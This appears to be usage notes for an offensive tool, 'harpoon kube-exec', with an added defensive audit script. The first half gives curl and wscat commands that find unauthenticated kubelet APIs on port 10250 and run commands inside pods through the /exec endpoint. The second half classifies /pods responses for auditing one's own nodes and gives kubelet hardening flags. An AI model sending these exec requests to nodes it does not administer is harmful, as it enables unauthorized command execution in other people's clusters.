harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]
If -e is given and the preliminary checks pass, harpoon will try to exploit the misconfiguration. This attack only works if you can route to the node API, so you either have to be on the same network or the node has to be publicly routable.
Check (verify/come up with a better check)
[[ "$(curl --insecure --silent "https://<node>:10250/pods" 2>/dev/null | head -c 2)" == '{"' ]] && echo Match
Execute command
curl --insecure -v -H "Upgrade: WebSocket" -H "Connection: Upgrade" -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1"
Stream results
wscat -c "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1" --no-check
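A stricter form of the check step, for auditing your own nodes. This is an added example, not harpoon's code: it looks at the HTTP status and the PodList kind field instead of the first two bytes of the body. The function names and the sample responses are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not harpoon code): classify a kubelet /pods response.

# classify_kubelet_response STATUS BODY
# Prints: exposed | auth-required | forbidden | unreachable | unknown
classify_kubelet_response() {
  local status="$1" body="$2"
  case "$status" in
    200)
      # An open kubelet answers with a JSON PodList; require the kind
      # field so that any other JSON document is not counted as a match.
      if printf '%s' "$body" | grep -Eq '"kind"[[:space:]]*:[[:space:]]*"PodList"'; then
        echo exposed
      else
        echo unknown
      fi ;;
    401) echo auth-required ;;   # anonymous requests are rejected
    403) echo forbidden ;;       # request identified, authorization denied it
    000|"") echo unreachable ;;  # no route, timeout or TLS failure
    *) echo unknown ;;
  esac
}

# check_node HOST [PORT]: fetch /pods from a node you administer and classify it.
check_node() {
  local host="$1" port="${2:-10250}" out
  # curl appends " <status>" after the body; it reports 000 when it cannot connect.
  out="$(curl --insecure --silent --max-time 5 \
         --write-out ' %{http_code}' "https://${host}:${port}/pods" 2>/dev/null)" || true
  classify_kubelet_response "${out##* }" "${out% *}"
}

# Constructed sample responses, so the classifier can be run offline.
classify_kubelet_response 200 '{"kind":"PodList","apiVersion":"v1","items":[]}'
classify_kubelet_response 401 'Unauthorized'
classify_kubelet_response 403 'Forbidden (user=system:anonymous, verb=get, resource=nodes)'
```

A node that reports exposed is serving the kubelet API to unauthenticated callers; running the kubelet with --anonymous-auth=false and --authorization-mode=Webhook closes that off.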